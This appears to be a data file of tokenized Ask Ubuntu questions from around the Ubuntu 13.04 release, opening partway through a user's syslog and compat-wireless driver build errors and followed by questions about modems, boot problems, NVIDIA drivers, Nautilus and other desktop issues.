apr 28 12:01:37 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : device state change : activated - > disconnected ( reason 'user-requested ' ) [ 100 30 39 ] apr 28 12:01:37 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : deactivating device ( reason 'user-requested ' ) [ 39 ] apr 28 12:01:37 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 8923 apr 28 12:01:37 pakete207-g580 networkmanager [ 996 ] : < warn > dns : plugin dnsmasq update failed apr 28 12:01:37 pakete207-g580 networkmanager [ 996 ] : < info > removing dns information from /sbin/resolvconf apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) starting connection 'alice-wlan84 1' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1/wireless ) : access point 'alice-wlan84 1 ' has security , but secrets are required . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1/wireless ) : connection 'alice-wlan84 1 ' has security , and secrets exist . no new secrets needed . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : added 'ssid ' value 'alice-wlan84' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : added 'scan_ssid ' value '1' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : added 'auth_alg ' value 'open' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : added 'psk ' value ' < omitted > ' apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > config : set interface ap_scan to 1 apr 28 12:01:46 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : supplicant interface state : disconnected - > scanning apr 28 12:01:48 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : supplicant interface state : associating - > associated apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : supplicant interface state : associated - > 4-way handshake apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : supplicant interface state : 4-way handshake - > completed apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'alice-wlan84 ' . apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > dhclient started with pid 9062 apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) beginning ip6 addrconf . apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . apr 28 12:01:49 pakete207-g580 networkmanager [ 996 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit pakete207 @ pakete207-g580 : ~ $ result of the test while connected to the domestic network ( not via wifi ) : pakete207 @ pakete207-g580 : ~ $ grep networkmanager /var/log/syslog | tail -30 apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > dhclient started with pid 3117 apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) beginning ip6 addrconf . apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > address 192.168.1.232 apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > prefix 24 ( 255.255.255.0 ) apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > gateway 192.168.1.1 apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > nameserver '192.168.1.1' apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > domain name 'localdomain' apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 28 11:30:50 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > policy set 'conexión cableada 1 ' ( eth0 ) as default for ipv4 routing and dns . apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > writing dns information to /sbin/resolvconf apr 28 11:30:51 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) successful , device activated . apr 28 11:31:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . apr 28 11:31:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 28 11:31:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 28 11:31:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . pakete207 @ pakete207-g580 : ~ $ update of the last steps performed ( note i had to delete some links becuase i can not add more than 2 , instead of http// should be http : // ) pakete207 @ pakete207-g580 : ~ $ sudo apt-get install build-essential linux-headers-generic linux-headers-`uname -r` [ sudo ] password for pakete207 : leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho build-essential ya está en su versión más reciente . linux-headers-3.8.0-19-generic ya está en su versión más reciente . linux-headers-generic ya está en su versión más reciente . el paquete indicado a continuación se instaló de forma automática y ya no es necesarios . linux-image-generic use 'apt-get autoremove ' to remove it . 0 actualizados , 0 se instalarán , 0 para eliminar y 8 no actualizados . pakete207 @ pakete207-g580 : ~ $ wget -o- http//linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 | tar -xj -- 2013-04-29 17:14:48 -- http//linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 resolviendo linuxwireless.org ( linuxwireless.org ) ... 78.46.109.217 conectando con linuxwireless.org ( linuxwireless.org ) [ 78.46.109.217 ] :80 ... conectado . petición http enviada , esperando respuesta ... 301 moved permanently ubicación : http//wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 [ siguiente ] -- 2013-04-29 17:14:48 -- http//wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 resolviendo wireless.kernel.org ( wireless.kernel.org ) ... 144.76.43.152 conectando con wireless.kernel.org ( wireless.kernel.org ) [ 144.76.43.152 ] :80 ... conectado . petición http enviada , esperando respuesta ... 200 ok longitud : 4650013 ( 4,4m ) [ application/octet-stream ] grabando a : “stdout” 100 % [ ====================================== > ] 4.650.013 1,55mb/s en 2,9s 2013-04-29 17:14:51 ( 1,55 mb/s ) - escritos a stdout [ 4650013/4650013 ] pakete207 @ pakete207-g580 : ~ $ cd compat-wireless-2012-07-03-pc pakete207 @ pakete207-g580 : ~/compat-wireless-2012-07-03-pc $ ./scripts/driver-select alx processing new driver-select request ... backing up makefile : makefile.bk backup exists : makefile.bk backing up makefile : drivers/net/ethernet/broadcom/makefile.bk backing up makefile : drivers/net/ethernet/atheros/makefile.bk backup exists : makefile.bk backup exists : makefile.bk backup exists : drivers/net/ethernet/broadcom/makefile.bk pakete207 @ pakete207-g580 : ~/compat-wireless-2012-07-03-pc $ make ./scripts/gen-compat-autoconf.sh /home/pakete207/compat-wireless-2012-07-03-pc/.config /home/pakete207/compat-wireless-2012-07-03-pc/config.mk > include/linux/compat_autoconf.h make -c /lib/modules/3.8.0-19-generic/build m=/home/pakete207/compat-wireless-2012-07-03-pc modules make [ 1 ] : se ingresa al directorio «/usr/src/linux-headers-3.8.0-19-generic» cc [ m ] /home/pakete207/compat-wireless-2012-07-03-pc/compat/main.o ld [ m ] /home/pakete207/compat-wireless-2012-07-03-pc/compat/compat.o cc [ m ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.o /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c : en la función ‘alx_hw_printk’ : /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:124:3 : error : declaración implícita de la función ‘__netdev_printk’ [ -werror=implicit-function-declaration ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c : en el nivel principal : /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1955:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init_adapter_special’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:2010:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init_adapter’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3472:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3780:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_remove’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3903:17 : error : ‘alx_init’ no se declaró aquí ( no en una función ) /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3904:2 : error : declaración implícita de la función ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3904:29 : error : ‘alx_remove’ no se declaró aquí ( no en una función ) /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:135:12 : aviso : se define ‘alx_validate_mac_addr’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:210:12 : aviso : se define ‘alx_init_hw_callbacks’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1698:12 : aviso : se define ‘alx_alloc_all_rtx_queue’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1757:13 : aviso : se define ‘alx_free_all_rtx_queue’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1773:12 : aviso : se define ‘alx_set_interrupt_param’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1824:13 : aviso : se define ‘alx_reset_interrupt_param’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1914:12 : aviso : se define ‘alx_set_interrupt_mode’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1941:13 : aviso : se define ‘alx_reset_interrupt_mode’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:2125:12 : aviso : se define ‘alx_set_register_info_special’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3043:13 : aviso : se define ‘alx_timer_routine’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3064:13 : aviso : se define ‘alx_task_routine’ pero no se usa [ -wunused-function ] cc1 : algunos avisos se tratan como errores make [ 4 ] : *** [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.o ] error 1 make [ 3 ] : *** [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : *** [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : *** [ _module_/home/pakete207/compat-wireless-2012-07-03-pc ] error 2 make [ 1 ] : se sale del directorio «/usr/src/linux-headers-3.8.0-19-generic» make : *** [ modules ] error 2 pakete207 @ pakete207-g580 : ~/compat-wireless-2012-07-03-pc $ sudo make install updating ubuntu 's initramfs for 3.8.0-19-generic under /boot/ ... will now run update-grub to ensure grub will find the new initramfs ... generando grub.cfg ... se encontró una imagen linux : /boot/vmlinuz-3.8.0-19-generic se encontró una imagen initrd : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin encontrado en windows recovery environment ( loader ) en /dev/sda3 encontrado en windows 8 ( loader ) en /dev/sda5 hecho make -c /lib/modules/3.8.0-19-generic/build m=/home/pakete207/compat-wireless-2012-07-03-pc modules make [ 1 ] : se ingresa al directorio «/usr/src/linux-headers-3.8.0-19-generic» cc [ m ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.o /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c : en la función ‘alx_hw_printk’ : /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:124:3 : error : declaración implícita de la función ‘__netdev_printk’ [ -werror=implicit-function-declaration ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c : en el nivel principal : /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1955:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init_adapter_special’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:2010:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init_adapter’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3472:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_init’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3780:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘alx_remove’ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3903:17 : error : ‘alx_init’ no se declaró aquí ( no en una función ) /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3904:2 : error : declaración implícita de la función ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3904:29 : error : ‘alx_remove’ no se declaró aquí ( no en una función ) /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:135:12 : aviso : se define ‘alx_validate_mac_addr’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:210:12 : aviso : se define ‘alx_init_hw_callbacks’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1698:12 : aviso : se define ‘alx_alloc_all_rtx_queue’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1757:13 : aviso : se define ‘alx_free_all_rtx_queue’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1773:12 : aviso : se define ‘alx_set_interrupt_param’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1824:13 : aviso : se define ‘alx_reset_interrupt_param’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1914:12 : aviso : se define ‘alx_set_interrupt_mode’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:1941:13 : aviso : se define ‘alx_reset_interrupt_mode’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:2125:12 : aviso : se define ‘alx_set_register_info_special’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3043:13 : aviso : se define ‘alx_timer_routine’ pero no se usa [ -wunused-function ] /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c:3064:13 : aviso : se define ‘alx_task_routine’ pero no se usa [ -wunused-function ] cc1 : algunos avisos se tratan como errores make [ 4 ] : * [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.o ] error 1 make [ 3 ] : [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : [ /home/pakete207/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : * [ module/home/pakete207/compat-wireless-2012-07-03-pc ] error 2 make [ 1 ] : se sale del directorio «/usr/src/linux-headers-3.8.0-19-generic» make : * [ modules ] error 2 pakete207 @ pakete207-g580 : ~/compat-wireless-2012-07-03-pc $
287137	installing huawei e153 in ubuntu 13.04	my huawei e153 was working fine in ubuntu 12.10 , i just upgrade to ubuntu 13.04 , after upgrade , i ca n't use it , it is un deteced in connection menu , how can i install it ?
287139	how do i install ubuntu server from a usb stick ?	how do i install ubuntu server system from a usb stick ?
287153	pc wont boot either ubuntu or windows 7	i installed ubuntu alongside windows 7 . after i installed ubuntu ran the first time . after i restarted i could n't get it to boot . i went on windows and looked for a fix . i tried it in the terminal , not sure what it was , was like sudo ( something something ) . the command that i used i believe moved something ( ca n't remember ) . i then restarted and it took me to the gnu grub . i ca n't reinstall ubuntu because it wo n't find a device for boot-loader installation . i think that i had ubuntu working fine when i did the sudo command and that i should have just waited longer for it to start up ( could be wrong ) if i can just boot windows i will be happy so if there is a way from the grub menu i will take that found the command i used not sure if it could have done much harm -- -- sudo e2fsck -n -v /dev/sdxy
287154	ubuntu 13.04 unity social lens not showing anything	my unity social lens is empty . i 've enabled social networking in my online accounts . i 've installed the friends twitter client , which is working fine . anyone any ideas ?
287157	how to use multiple mobile broadband , one for browsing and one for downloading , at the same time	i have two mobile broadband to connect to the internet . when they connected to the computer both are accessible from the network manager , but only one can be connected at the same time . currently i use the first one using nm one my host os , for browsing the internet and second one using a guest os . how can i use multiple mobile broad band at the same time without using a virtual machine so that i can save the resources used for the virtual machine . i know this is a difficult task and requires command line play . there are several possible ways to answer . 1 . like normal broadband ( eth0 , eth1 ) using some ip stuff but mobile broadbands ca n't be accessible using ppp0 , ppp1 ( unless they are connected using nm ) 2 . 1'st network for all application and 2'nd for a single application that downloads say wget . so 1'st device is connected using nm and the other using a special program or something like that ( or the downloader th self is capable of that ) .
287160	facebook icon not visible in envelope menu	on a clean 13.04 install , i have registered facebook in the online accounts , authorized facebook to allow ubuntu access , and installed the app . but still i am not getting the facebook shortcut icon in the envelope menu ( that i used to get in 12.10 ) at the top right . please help . slightly off topic , but for pidgin , now i am getting an icon integrated in the envelope drop-down , instead of a seperate icon on the systray i had got in 12.10 . now its not shown , even if i have facebook actually open in browser ... .any help ?
287162	steam-launcher can not connect to network	i was downloading team fortress 2 via steam for ubuntu when the download paused suddenly . i tried to replug my wlan stick ( tl-wn821n by tp-link ) but it can not connect . thanks for help .
287163	background turned white	after installing ubuntu 13.04 initially background worked perfectly ( i can change whatever i want ) but after some time ( may be 5 restarts ) background turned white , even if i change nothing happens . also `` nautilus /usr/share/backgrounds '' is present .
287166	nautilus 3.4.2 in ubuntu 13.04	however many might disagree , i 'm not a big fan of nautilus 3.6 in ubuntu 13.04 . in my opinion it works way slower because features like search-as-you-type and multiple panes are gone . these were the two things which i used soooo much , and now they are gone ( as far as i know ) . so is there a way to downgrade my nautilus ? or are there packages i can download to tweak nautilus or something ? regards , brent
287173	getting nvidia geforce gt 635m to work in 13.04	i tried installing nvidia drivers in 12.10 via x-swat repository , and primus , and noveau , and a million things i found on the net and everything just broke the system , until i finally got bumblebee to run and it was okay for some days ... but the next upgrade again broke the x and i had to do low-level stuff . fortunately , 13.04 was released and i did a clean install . now in 13.04 , i need someway stable enough to get my gpu benefits without spending all nighters everytime i update my system . in that line , i downloaded the nvidia linux drivers from nvidia site ( 310.44 version ) shown for my geforce gt635m graphic card . ( btw is this the latest version ? i saw 310.88 somwhere on internet ) but now am stuck with the below questions : 1 ) how to install this .run file in ubuntu 13.04 without breaking anything now , or in the future updates . 2 ) is installation of proprietary drivers stable enough ? 3 ) am sort of mixed up about the various terms i have read about - primus , nouveau , bumblebee , optirun , etc ... can anyone help me with some accurate and decent reading material/sites where i can read and understand what is what ? 4 ) and finaly is there a gui i can use for config and stuff post installation . 5 ) also , why i am not getting the available drivers listed in the additional drivers section of the settings gui ? for me that proprietary drivers page is all greyed ( disabled ) . there are no device driver options listed . is there a way to get my nvidia drivers shown here ? as suggested by tuxest , the below commands give the provided output : ~ $ sudo lshw -c video *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) ~ $ lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : asustek computer inc. device [ 1043:1447 ] kernel driver in use : i915 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 635m ] [ 10de:0de3 ] ( rev ff ) 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : azurewave device [ 1a3b:2c97 ] kernel driver in use : ath9k does is all look okay ? why is the nvidia not displayed in the first command output ? update : i installed the 319 drivers along with bumblebee and the system is running just fine ... but have a follow up question here : no nvidia/nouveau modules loaded , but sytem working fine ? i need to update the system kernel and am afraid to proceed ... can someone please help ?
287180	how to compile and run a cobol program ?	can anybody explain me how to compile and run a cobol program in ubuntu ? i have never written any program in ubuntu . please , give me a simple program to compile and run .
287181	only root sees all icons in gnome-control-center after upgrade to lubuntu 13.04	symptoms : root @ thinkpad : / # gnome-control-center = > gnome-control-center opens correctly showing all modules root @ thinkpad : / # gnome-control-center sound = > gnome-control-center opens the sound panel anynormaluser @ thinkpad : ~ $ gnome-control-center = > gnome-control-center opens showing only 3 modules : languages , printers , software anynormaluser @ thinkpad : ~ $ gnome-control-center sound ** ( gnome-control-center:12466 ) : warning ** : could not find settings panel `` sound '' all files/dirs in /usr/share/gnome-control-center and /usr/lib/control-center-1/panels are readable/executable for all users . tries : re-installed gnome-control-center with synaptic . result : problem is still the same ! made an strace as non-root user : ... open ( `` /usr/share/applications/gnome-sound-panel.desktop '' , o_rdonly|o_largefile ) = 15 fstat64 ( 15 , { st_mode=s_ifreg|0644 , st_size=634 , ... } ) = 0 read ( 15 , `` [ desktop entry ] \nname=sound\ncomme '' ... , 4096 ) = 634 ... open ( `` /usr/share/applications/gnome-sound-nua-panel.desktop '' , o_rdonly|o_largefile ) = 15 fstat64 ( 15 , { st_mode=s_ifreg|0644 , st_size=636 , ... } ) = 0 read ( 15 , `` [ desktop entry ] \nname=sound\ncomme '' ... , 4096 ) = 636 ... any user can read the sound panel desktop files , but the icons are not shown either ! how to get rid of this problem ? how does gnome-control-center `` find '' its modules ?
